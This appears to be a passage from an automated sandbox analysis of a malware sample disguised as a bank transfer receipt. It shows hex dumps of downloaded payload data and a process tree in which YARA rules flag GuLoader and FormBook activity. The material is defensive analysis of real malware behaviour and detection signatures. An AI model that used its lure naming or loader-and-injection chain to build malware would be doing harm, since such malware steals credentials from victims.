2021-12-15 13:13:49 UTC	150	IN	Data Raw: 3b 51 1d 4f 74 ff a0 ec 90 91 ad 8c 0c a0 c6 e9 d5 c9 31 50 65 0e 97 13 79 fe d8 98 46 48 19 94 cc d6 d4 af a6 43 2b 6d 9b 5f 74 f8 6f 89 05 d6 6a 7e e8 33 3a e8 2a aa 4a c7 1e cd 04 33 ad 90 2c 86 fc 85 36 f8 0e 77 f2 93 8a 8d a3 25 ef 33 e8 aa d4 c2 7e c8 62 7c cb 0c 6f aa e8 e7 50 14 18 77 3c 4c f4 5c f8 c2 00 8b 0b c2 81 67 7e c7 86 ee b1 f8 ed 35 f6 5e c3 18 77 ce a2 dc 7d 46 fc 34 1f 9f 6f aa 74 0d 3c 6c 25 5f 25 51 3d 93 3f 9d 0d e9 2c b5 00 75 65 e3 bb 37 1d 38 01 45 9f 85 cc de 37 62 c9 2b b0 05 78 77 18 26 d7 00 32 bf a7 68 2a 1a f1 8b 21 b3 31 b3 31 c0 71 1b 89 3c b9 a8 7a e4 11 4f 83 cc cf 16 e5 a2 31 60 a1 21 ca d5 51 43 c4 87 05 10 f9 ef 2e a7 95 10 4c 12 c4 53 cc 08 51 ab 1f 39 19 b5 1e b2 a5 83 99 08 30 e0 56 fe 4f 76 82 34 4f 7e 21 f8 24 Data Ascii: ;QOt1PeyFHC+m_toj~3:J3,6w%3~b\|oPw<L\g~5^w}F4ot<l%_%Q=?,ue78E7b+xw&2h!11q<zO1`!QC.LSQ90VOv4O~!$
2021-12-15 13:13:49 UTC	151	IN	Data Raw: 8b 68 11 7a e2 7f 2a 59 91 97 38 83 b1 9c 27 46 26 ba e2 aa b1 52 7e 4f 28 35 29 cb 1c fc a5 a1 c3 02 65 08 f6 a0 b9 cc bd 7c 7b 57 f4 31 90 20 d3 8b 06 bd 47 51 2b c5 b0 42 a2 b3 e7 07 a0 c9 95 ab 09 e1 ea 83 75 8f d3 bf 2f 0e ac b1 bb d1 f5 6b d9 03 79 90 fb 26 77 99 a8 95 b1 3d ef cc 04 a5 be d8 f4 ac 0b 19 e4 e1 d4 4c 1d 34 07 27 49 05 13 ab 2a 16 5b ea 01 c8 ad a2 66 3f a1 a3 33 95 ff 06 da 9d 6b 94 de 0c 6f 1b 53 80 f2 c3 10 53 e3 f0 af 58 67 07 44 87 7a 77 3a c2 35 7d 34 c4 a3 68 68 bf fb 14 32 99 91 10 eb f9 6f 83 ab c6 cf 98 7c 91 54 b8 49 fb 86 9c 2c ff 2a c2 f7 75 39 99 3b 31 c6 fb 17 b4 a9 36 eb 71 17 91 9d 82 1b ff d1 1b d2 1b c5 f4 89 00 c6 b9 3a 6f fc 98 a8 07 22 6d fc 29 19 cf 09 69 df ed 5c aa 00 5f fd 14 2e 96 67 36 16 cf 3d 15 76 ec b2 Data Ascii: hzY8'F&R~O(5)e\|{W1 GQ+Bu/ky&w=L4'I[f?3koSSXgDzw:5}4hh2o\|TI,*u9;16q:o"m)i\_.g6=v
2021-12-15 13:13:49 UTC	152	IN	Data Raw: 51 8c a9 92 77 17 a6 bb 22 1c 8e 71 ff 31 91 09 f7 28 50 9d d7 12 47 d2 06 0b cb 96 80 00 df 90 42 cf 91 d3 7f e0 07 3b f7 26 09 4d cc 12 1a df e0 0b f4 89 33 c2 b1 18 f6 90 9c 51 96 8b bd 52 17 67 fc 77 62 8e 99 56 a7 8c ec 78 53 07 57 06 12 8b de 35 52 86 54 12 cd ab 1a ef c1 67 72 3b f2 01 41 da 7f fe ed 33 d0 6b 38 25 c4 6a 9d 82 cd 6e c8 ac f0 3c 21 5b 18 40 33 94 1c 6d e6 21 ea f6 e3 b4 8a 8c 42 2d af 9c f1 83 8f 24 af 76 24 f7 9d 57 87 07 81 fa ee 21 95 94 7f e2 cf 97 5a 50 ac 3d b2 3c 03 24 2e 95 f5 a2 38 9c fe 8f 13 3a 2e 44 4d e7 6c 0c e3 51 dc 64 dc 8b 52 39 36 f3 40 ec 8e f3 ee 0b 75 e9 c6 ae 1b 04 e8 01 29 8e c8 2c e1 f3 4a b4 55 5c 00 a4 e8 ce 8e 43 47 49 05 58 d9 1b c3 a3 60 0d ad b0 9b 74 84 e8 52 f4 52 db fa 31 59 58 a3 13 f4 ce 6a a7 25 Data Ascii: Qw"q1(PGB;&M3QRgwbVxSW5RTgr;A3k8%jn<![@3m!B-$v$W!ZP=<$.8:.DMlQdR96@u),JU\CGIX`tRR1YXj%
2021-12-15 13:13:49 UTC	154	IN	Data Raw: 32 59 ed ba 37 fd d7 ac 1b ee 40 28 6a 09 a7 5d 8b 80 76 ff 66 cb a2 3f 71 86 39 c4 a3 e0 83 f3 2e ab 84 34 8a 93 8a f7 62 53 4e 4a 25 d9 96 30 03 d4 a4 1a d8 97 69 5c 24 ca 56 b0 1e b6 92 75 47 80 93 d6 c6 20 a8 e7 b1 b4 1a 3f ec 5c 49 ce 99 a7 02 54 77 83 a1 81 34 bc a7 90 b1 c9 1a 9a 14 ee f9 b1 b5 ac bf 58 ba cf b2 d9 8f c0 ca 8f bb 87 8f 5e 59 8f 2b df d1 0f a0 32 8d 25 04 fb 2b 36 b9 6a 1d 4f 21 c1 68 78 25 cf 92 d6 0a 6c ff 8f ac b9 e5 47 64 48 7a 4e 2d c7 52 cc 11 07 9c a6 cc 56 eb 5b ba bf 53 5f 36 c6 0e b1 78 1b 58 05 d3 00 be 5f 8a 92 75 5e 26 d9 2a c5 ce 91 94 76 c0 25 97 41 cd b7 06 d7 ce 5b 64 20 dc a1 33 20 ad 2d a6 95 7e ca 89 6c 14 5e 84 14 82 e4 f6 44 bf ae 9e 64 f3 ee 9a 58 d1 89 2d c3 ab d1 f1 51 28 80 cb 87 f2 41 af e6 5d c5 cd d3 9e Data Ascii: 2Y7@(j]vf?q9.4bSNJ%0i\$VuG ?\ITw4X^Y+2%+6jO!hx%lGdHzN-RV[S_6xX_u^&*v%A[d 3 -~l^DdX-Q(A]
2021-12-15 13:13:49 UTC	155	IN	Data Raw: 24 c0 a4 12 f4 fa 8c 6e 3c 9a 14 83 36 67 6b 4a 23 41 ab 25 2e bc a7 6f 39 1b ac d6 70 1f b9 35 04 1f db 3d 7b a4 a2 e3 81 cd 8f a1 89 b2 74 e0 9c b4 b6 3e 28 96 8e af c6 01 77 9c 31 f7 07 1b 60 d4 1c d8 d7 a2 56 2c c4 b8 b0 41 46 dd b3 71 9e c7 1d 5d 17 26 0d 69 c3 1c 73 57 c1 a3 fe 1e 05 1e fe 52 fc 94 53 b5 ce c1 84 b4 54 1d 01 20 be 09 74 ef de 19 c5 b2 a3 e7 fb 9a c8 be 65 dd f9 80 04 29 21 10 09 be 0f dc 15 85 21 cf e9 27 91 16 5a 9e 36 89 a4 6f 77 dd dc 9e 32 7d 9b 08 26 51 af 35 77 17 11 d8 22 40 80 7e e3 a3 a1 1a 7b 16 c2 37 5e 1c 61 b2 8c 2e b1 27 d6 37 10 1c da 2b 17 af 0c 7e 5f 0b 40 e4 5f 0f 6e 17 56 36 0a 4c 5b d0 fb ab 45 58 f5 1a 48 7c 92 80 d1 2a 09 c8 03 f8 3b bd 16 f7 5e 9b 93 56 6f d2 ad f0 e3 e3 72 f0 24 8c 47 30 a2 49 e8 e6 80 95 15 Data Ascii: $n<6gkJ#A%.o9p5={t>(w1`V,AFq]&isWRST te)!!'Z6ow2}&Q5w"@~{7^a.'7+~_@_nV6L[EXH\|*;^Vor$G0I
2021-12-15 13:13:49 UTC	156	IN	Data Raw: 63 c4 98 ca 6f 96 be c5 ce c9 96 48 07 94 bd a0 78 3e bb 50 a6 5f d5 f8 01 41 43 80 ea ed a3 86 dc d4 6f c3 d2 4b 89 80 75 54 ef af 81 6e dc bb 0b 7e a3 bf e2 ce 3d ff 8f 1a 3f 96 65 ed 0b 44 1f 1d cb 42 5b 73 4e 1d a9 6b 40 9e 69 c5 e0 a7 5c 86 8c 93 dd 14 5c a2 c7 3f ed 2c 60 54 a2 79 ba 44 1d ff 66 9c ce 46 a8 64 3c 2b 34 3e 12 1c 5e 91 06 41 34 78 05 ae e0 89 dd a8 29 76 1b b0 71 7e 7a 66 fb 7a d9 c1 db e4 9d eb 5c 45 26 b6 98 5a f6 5f 65 ae 85 7c 01 ed a7 af 0c 5c c9 cc a7 16 43 f1 a8 85 69 ac c9 38 c5 f6 cc c3 f6 a6 77 89 39 37 50 71 65 55 d5 ea da 5a 01 5d 87 51 fb 26 11 d1 4b 7b fe e0 1c 6b 77 ff 37 c5 16 cf 8b f0 b3 21 32 29 bd 6a 8a 3d 4d fb 02 b8 93 9e 12 15 ac 03 40 27 d3 d1 70 d5 f2 4f 36 f0 54 11 c0 8b 1c 60 b2 ef 1f d5 15 03 dc e8 cc da 89 Data Ascii: coHx>P_ACoKuTn~=?eDB[sNk@i\\?,`TyDfFd<+4>^A4x)vq~zfz\E&Z_e\|\Ci8w97PqeUZ]Q&K{kw7!2)j=M@'pO6T`
2021-12-15 13:13:49 UTC	157	IN	Data Raw: 7e b0 2b fa 16 d3 8f 0b f9 62 05 72 18 13 cd aa dd 07 4e 11 09 dc d4 f9 5b e2 40 17 72 de 5a 5b 33 65 b1 85 0f 5e e2 d1 56 dc 89 c3 5c 8a 1b 75 9d e3 5e fc 73 15 f3 53 f5 78 07 bc f6 a6 9c 5a 05 24 0f a3 37 1c 33 fc e8 e6 b7 9c 4b fe 7a da 91 6d 32 a1 e1 f6 6e 00 81 90 84 1b 69 bc 79 9a 99 56 21 bf 40 77 7c 2d 22 b8 e8 0b 13 c7 6a b0 52 cc e5 1a 7c cb 63 57 f7 19 23 5e f3 0f 0d 13 af a7 5f 69 94 68 db 35 04 6d b5 c0 8d b1 f1 b2 3c 20 8c 57 55 89 80 10 15 61 e0 cb 9b 7e d0 58 e3 63 d9 32 0f 71 bf 5c 9e 23 49 2c 92 c7 39 68 e1 a0 d7 7d 22 b0 cf 92 ad 9c 86 7b 1d 6e f9 0a 8b 12 1f ae 1c 76 02 8f 49 c0 a8 cd c7 1b 87 d2 be 67 2a ce fe ba b7 d6 13 70 83 8a 5a 6a fb b9 e7 ca f2 c1 9b c9 25 c3 3e c0 9e ed b1 41 e5 6d 5d c6 60 a3 44 d6 54 f5 52 b7 26 d6 2a e1 de Data Ascii: ~+brN[@rZ[3e^V\u^sSxZ$73Kzm2niyV!@w\|-"jR\|cW#^_ih5m< WUa~Xc2q\#I,9h}"{nvIgpZj%>Am]`DTR&
2021-12-15 13:13:49 UTC	159	IN	Data Raw: 8f 4c 33 8c c3 fe 14 da 68 6f d5 96 94 de 83 2d 95 95 9c 0f e6 cb 92 f0 0c b4 16 c5 31 ad c5 5d d7 7e 7c ee 44 19 55 3d 91 22 4c 54 eb b5 70 08 5b e0 e8 11 7b 11 70 03 61 c3 04 63 96 ee 10 8a d5 55 3b 71 52 46 da b4 29 38 7f 77 1d fa 6f a3 f3 9d 15 0a 5e ba 74 3b 0a 49 d7 08 75 75 a6 ec 8f 40 b2 2f 6f d0 21 48 96 04 b2 ac d8 e4 97 b9 2d 20 21 7d ee 14 b8 a8 f2 9f 34 6f 0f 35 1c 65 f8 fd c1 30 ae f1 0e 89 5c e5 9d 61 47 df d9 62 7d a5 94 75 73 5b b9 79 2b 4d 35 0d 8d b4 28 d8 9a de df c7 df 3a 66 83 3c 70 82 c3 36 78 46 36 3d 12 ac ef 68 e0 cc 8f 06 45 39 64 0e b2 26 bf b3 2a fb 4c 7b 88 a1 7d b4 a4 f4 8c ca 94 17 f2 ea 65 c8 e1 9b 9c 2e f6 39 5a 51 0b 74 0c 38 ea 2a 8a 5b 8f 43 45 44 a9 92 e5 5b f9 bf ee 41 c5 1f 86 db 3d 5b 01 4f 68 29 a1 4e ae cb 3a 62 Data Ascii: L3ho-1]~\|DU="LTp[{pacU;qRF)8wo^t;Iuu@/o!H- !}4o5e0\aGb}us[y+M5(:f<p6xF6=hE9d&L{}e.9ZQt8[CED[A=[Oh)N:b
2021-12-15 13:13:49 UTC	160	IN	Data Raw: ee 4a dc db 81 31 83 85 a2 ad 29 8d 5e e2 4a 6c 7f dd a2 59 c1 bf de c3 37 07 16 c1 8c 40 50 f6 9f 83 9b db c8 aa 6c e4 5b db d3 49 68 61 1e df 37 de 47 8f 66 1c 7f 99 54 7d ec c4 62 36 5d 6d 2b e4 ce f1 ab 4f 42 07 71 2a f6 e0 6b 46 37 aa 94 86 d4 d1 ad b9 3a d5 7b b5 60 92 a9 4d fa d0 c5 20 dc 48 62 79 ca 6a db 39 63 f2 38 4c 09 98 46 76 5c 69 9a 15 1d 7d 4f 88 1c 37 9e d3 d4 e6 d2 60 aa d8 a7 f2 8d ed 9e f5 07 c4 52 b5 8f a9 11 1f 7d c6 f8 80 0f 6e d3 1b 8e 57 17 db fd 16 c1 a2 c1 5b 71 65 90 7e ac 89 a2 50 ec ff 31 0e 2a d7 fd b9 8d 05 b7 48 a5 36 9b 13 f0 5a 0c 14 c6 3f 34 06 dd d0 f9 af 4e 4b cf 93 b3 f6 0b 08 85 e3 1f fe 54 db 88 b1 0f 67 78 9d 07 73 8a ed 71 e6 37 2e dd d6 06 07 8e 14 eb 17 5a 86 64 15 8e ca c1 12 75 d1 bc f3 8a 97 56 08 5d 15 33 Data Ascii: J1)^JlY7@Pl[Iha7GfT}b6]m+OBqkF7:{`M Hbyj9c8LFv\i}O7`R}nW[qe~P1H6Z?4NKTgxsq7.ZduV]3
2021-12-15 13:13:49 UTC	161	IN	Data Raw: 49 46 7e 50 10 e6 7d d5 b6 52 a1 21 67 95 71 1c 93 38 e0 4f 86 6b 5d 16 bf 4d c0 fd 5f 51 d6 b0 ff ac ec de 48 48 43 0a 8a b0 2e ed e2 e0 db 03 9d c3 2e 75 b4 0e d5 a8 e6 39 9c 27 2c 3d f1 0f 64 b8 ae 1f 2b e9 02 6f f7 09 25 80 3e 45 38 f7 96 82 2b 24 f1 9f 65 8f 32 6d e6 ff e9 21 72 91 36 56 d4 de 5e 9e 16 4d 88 9e 5f 8b 16 66 a4 fc e6 80 e1 90 b9 0f b6 97 95 8d cb 99 f0 48 77 8b cd b6 8f 0b 40 17 0b fb c0 d7 44 8b f9 4d cc de 00 cb a7 9f 64 5d bf 35 57 13 65 a9 72 e4 f3 83 a1 fa e4 cc 4d 65 0c df 4c c9 0c 18 84 6a 3b e7 09 03 d9 67 e0 13 af a1 74 46 10 9e 50 38 01 c0 ba 90 46 11 da 6b 8d a8 3b bb a9 48 52 34 86 2a 9f 93 65 39 fc e1 45 25 57 73 ec 46 da 64 0c cc fe 6a d9 53 42 50 ab d9 84 48 95 be 77 6e ed d7 4a fe cd e5 4d 34 e8 ad 44 1d f5 05 cd 09 d4 Data Ascii: IF~P}R!gq8Ok]M_QHHC..u9',=d+o%>E8+$e2m!r6V^M_fHw@DMd]5WerMeLj;gtFP8Fk;HR4*e9E%WsFdjSBPHwnJM4D
2021-12-15 13:13:49 UTC	162	IN	Data Raw: 96 b8 cc 73 6f 8a 89 a1 4b df b5 c3 38 c6 7c f6 dc 41 fe 41 8c 34 a6 a5 17 89 e7 d7 a4 2b ec 73 6f 6b 37 9a a7 b6 0c aa 96 a1 6f 1e 08 d5 10 aa d1 f1 b6 18 dc ee 99 a6 c7 9d aa a9 9b 2e 67 f6 92 41 81 0a 09 b1 37 77 3b b7 10 13 bf 6e a6 14 5c 91 01 df 6f 61 18 ba 20 90 d4 d1 9e ed a3 ea 77 dc fe 6d f7 4b 61 c3 17 ae 39 ba 9b 94 47 f7 f0 20 4b 06 9a bf e1 f7 22 ef ff f9 b0 60 c1 fc 25 c2 47 f8 32 de 6c fb 5f c2 68 1a fd 0d 87 b5 67 df 00 be be 7e c5 ce 61 cd 80 62 c9 39 0b 7a 89 28 51 74 24 71 06 bd ed e9 18 16 d5 02 41 8b 05 b4 d9 ca 6b 5c 33 d3 42 b1 6f ce 69 c7 11 ec 0c f8 00 f9 9f 61 d5 f5 3e d4 e7 81 d3 e2 7e cb 7e bd c8 aa cc 5e 86 60 d4 e1 82 00 98 b1 9f 98 9c 3e 77 da c7 dc 72 cd c7 a0 ce 3d 15 c0 72 48 0e 43 e5 52 09 1b 4c c2 f1 65 e2 a1 69 35 d5 Data Ascii: soK8\|AA4+sok7o.gA7w;n\oa wmKa9G K"`%G2l_hg~ab9z(Qt$qAk\3Boia>~~^`>wr=rHCRLei5
2021-12-15 13:13:49 UTC	163	IN	Data Raw: f0 ed 90 31 c4 d0 00 a2 c6 d0 d1 e9 f1 6f a3 a2 b7 71 41 28 7c 69 49 82 ef 30 db 10 43 d7 5f 48 1f 4f 80 b1 7f 23 bf dd 3b 28 b9 29 1e 7d 80 7e fb ea 96 9e b8 b0 a2 ee 81 de 4c 36 c2 ac 28 45 aa 7d 32 a4 77 ff 9a bc 1f c7 de 71 b0 84 d1 90 b8 1f ea c8 e8 5e 54 ef e0 02 dc 48 42 48 22 7f db 88 95 18 37 36 b8 96 21 5b 18 55 01 1e 97 c9 72 b5 9c c2 6d b6 65 82 ce d2 a6 20 b8 44 fe b0 de 2d e5 55 28 53 2e 06 99 ee fc 81 6c 4a de 3a 4a 81 d6 85 d2 72 f7 94 ce 84 10 eb 7b 7b 03 db 48 c7 b6 85 db 79 7b bb 5d 27 54 65 49 05 ae 85 25 9d 4c f4 ea 9a 63 08 c0 33 b7 42 4a ee 85 63 e6 a2 84 f4 43 15 12 e9 05 44 73 09 08 6a 1d 9f 80 d8 97 19 d1 65 c5 8b 79 52 b6 ef 6d f7 88 09 61 2a c4 fc 2c 54 64 63 4a 97 46 4d a1 03 6d 6b de 8d d2 8d 24 0c a8 11 c4 8b 12 bf 1e 82 98 Data Ascii: 1oqA(\|iI0C_HO#;()}~L6(E}2wq^THBH"76![Urme D-U(S.lJ:Jr{{Hy{]'TeI%Lc3BJcCDsjeyRma*,TdcJFMmk$
2021-12-15 13:13:49 UTC	165	IN	Data Raw: ed 89 58 27 c8 05 0f f9 8b 66 92 75 9c d2 81 cd 09 d6 fd bc 43 ab 23 6c e0 ce 8d 9a 49 9a 09 fe 6a 05 af 9c e2 5b b1 2e 11 54 c4 91 11 10 d4 bc 9a e8 05 d7 03 0a 9c 34 b4 fd 92 dd 03 2c 0b bb 6c 8b 98 8e d8 58 11 4f 78 b9 0c 53 2b 55 ce 6b 6a 85 07 05 ff d2 06 3f 78 99 6e 8e ad 4d b2 ad b5 f4 7a 0f 45 1e d2 65 4f ee 9d c7 72 ad ff 93 78 c7 1b 92 2a 6b 2c b4 53 91 16 e1 36 28 7a cf 33 69 ba d8 c8 c7 f3 3a b3 86 fc 8a c6 40 4e ac 3c 75 81 90 1b e5 9d 56 5a e0 61 9f c7 f5 9d 95 ef 78 75 51 d4 46 11 e6 92 b8 b0 c9 8a 0b da 4e 7b 3e bd 23 10 5c f5 f6 43 b7 a4 9e eb fa 04 92 a5 83 72 22 ea 06 30 1f 48 21 06 de 93 7f 69 92 2f 2d 6f e0 97 a3 10 a2 3c 52 c4 ae 20 14 a5 5d 43 cb ee 41 cc cb 5b 09 26 dd 12 f1 19 d5 be a0 74 5d 4c 67 5d fc d2 9b ac e2 f8 94 36 09 8c Data Ascii: X'fuC#lIj[.T4,lXOxS+Ukj?xnMzEeOrx*k,S6(z3i:@N<uVZaxuQFN{>#\Cr"0H!i/-o<R ]CA[&t]Lg]6
2021-12-15 13:13:49 UTC	166	IN	Data Raw: 77 f2 d5 4b 72 e2 54 3a db d2 88 6b 77 86 62 74 2b 46 ea 5a 56 93 59 1d e7 1c 42 86 a4 e5 52 b7 73 2e cd 79 61 e0 ad 19 f3 8d 0e ab f5 c6 fc 55 26 8a 96 41 87 18 ea cb 50 d1 d3 a1 12 c9 78 9c 0d 5e e0 4f 1f 34 88 f2 20 99 b0 45 2b 3a 45 a6 07 26 0a b0 3f f1 b4 b2 64 66 7a 34 ef af 34 d7 fe 6f 8a 06 02 fb 6a 82 49 49 5e 34 30 dd 74 ef 1d 81 aa ec 36 55 eb 7b 38 a1 76 b2 d0 6c 9f 55 5e 11 1e 72 2a f6 63 1d 70 a0 c7 b2 54 1b 08 25 8b d5 d2 97 b6 56 f5 c1 ff e8 3e 37 24 6f d7 24 0c 10 85 bf b5 0d 16 5c 71 f7 c6 84 20 d1 ce 9e 77 4a 65 78 bd 82 6b 47 a5 00 63 d4 4a 45 9b 39 df 80 ea ff e0 05 c3 4a 99 a0 f9 b9 98 8a a6 0b e5 7b 82 e9 0c 5e a8 19 4d 18 a0 47 d5 2a 51 5e 6e a0 f9 6a 04 03 7c a3 f5 a9 07 05 0a 33 2a 80 b6 69 a1 95 62 6e 13 01 6a d3 49 a2 74 90 59 Data Ascii: wKrT:kwbt+FZVYBRs.yaU&APx^O4 E+:E&?dfz44ojII^40t6U{8vlU^rcpT%V>7$o$\q wJexkGcJE9J{^MGQ^nj\|3*ibnjItY
2021-12-15 13:13:49 UTC	167	IN	Data Raw: af 55 74 01 60 3a 9c 5e 4e 37 61 e4 a0 3c 33 6c dc 44 4a 76 1f 65 78 a6 38 d8 82 e1 e6 c6 7a 0a 5e c1 b3 b1 34 d8 f1 81 4b 02 57 d4 da 9e 7a e0 30 93 78 e5 17 ad 29 a5 a0 42 1f f7 a5 5e d1 3f 44 f0 01 1a 38 07 2d 62 23 90 bb c9 cb 87 0c 45 24 4b 6b d3 37 eb fb 89 22 45 75 3f 43 0c 48 b6 c9 1e 50 c4 f2 11 ce ce 52 17 5b 0f c3 63 d1 d9 3b e7 57 50 22 ef 2f 42 ea 73 12 63 89 9e d6 3a 2b 2a ec d7 ec a2 22 c3 68 8a 71 5f ae ac 0f 4a 41 f9 6d 4d ce 11 c4 a9 0c ab b2 74 7a 32 ad f4 be 34 43 7e ee cb 71 00 55 36 d7 1b 50 c2 9d 45 ef 86 d6 b0 dc 93 c5 1a 8f d8 86 cf d3 ad d5 08 67 ad ab c7 54 28 62 8b 8a ad 23 53 ae 9e d7 a1 37 3b 5b 39 7e 0d 98 e8 2e 4c c7 ab 15 e1 d5 25 cd 7c 16 8f a8 07 3b 8d 17 5e 9d 13 13 b0 ff cf f3 63 72 f2 ae 32 19 c8 a3 98 cb c5 c4 db 4a Data Ascii: Ut`:^N7a<3lDJvex8z^4KWz0x)B^?D8-b#E$Kk7"Eu?CHPR[c;WP"/Bsc:+*"hq_JAmMtz24C~qU6PEgT(b#S7;[9~.L%\|;^cr2J
2021-12-15 13:13:49 UTC	168	IN	Data Raw: 13 d9 24 ce ae 84 0e ed e9 59 d8 d0 35 1d 1b 72 80 a3 a1 ee ed b0 59 ab 18 7d 3d 35 94 00 e7 36 43 17 f8 cc 93 30 0b db 60 79 a4 da 30 fa 87 4e 3a 23 dc 10 4d 73 51 e1 eb 88 04 f2 2b 1a 9f 82 e2 a9 fa cc f2 4e 41 59 30 9a 6f e3 82 ad 12 1e a2 ee 2a 3c fa aa c5 5e 41 58 fd 93 31 03 90 a5 5b 0b f7 b6 7b 54 e2 2a da 5b a4 c0 ac 1e cb bb 2b 95 48 21 33 1f f1 7a 44 ae df 43 c2 3f b1 e3 92 13 b4 32 9f ed 7a 09 04 88 60 25 78 04 58 c2 0c 85 7f ed 30 e9 99 e1 1f 9c 75 fd d3 6e 57 4c 69 99 b7 6a ad c0 6f 76 ee a4 1d bf ca 4b 6d 11 78 13 ba 4f d6 75 c9 fd c4 c9 56 36 5f 28 f9 a6 ec a3 bd 04 e1 da 34 f3 36 6a e5 8a 81 22 79 36 d3 4c 5f 23 f8 f7 32 85 a1 72 03 f3 75 73 69 83 4b 69 2c 6f e0 d4 cc 94 a1 a6 21 9b a0 c8 75 4a ed de 60 cc cb 9f 5b 7a 89 c8 a5 27 dd 9f 4f Data Ascii: $Y5rY}=56C0`y0N:#MsQ+NAY0o<^AX1[{T[+H!3zDC?2z`%xX0unWLijovKmxOuV6_(46j"y6L_#2rusiKi,o!uJ`[z'O

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe PID: 4360 Parent PID: 4884

General

Start time:	14:10:29
Start date:	15/12/2021
Path:	C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe"
Imagebase:	0xf30000
File size:	209920 bytes
MD5 hash:	72A345C95142AEE60E7DF54B570C2C6B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: nongrav.exe PID: 6136 Parent PID: 4360

General

Start time:	14:10:30
Start date:	15/12/2021
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	BEB33BD2BF3282F8C86081144236545D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: rundll32.exe PID: 1096 Parent PID: 3352

General

Start time:	14:10:40
Start date:	15/12/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff734500000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: nongrav.exe PID: 4520 Parent PID: 6136

General

Start time:	14:12:08
Start date:	15/12/2021
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	BEB33BD2BF3282F8C86081144236545D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3352 Parent PID: 4520

General

Start time:	14:13:52
Start date:	15/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6932 Parent PID: 3352

General

Start time:	14:14:16
Start date:	15/12/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0x7ff70d6e0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
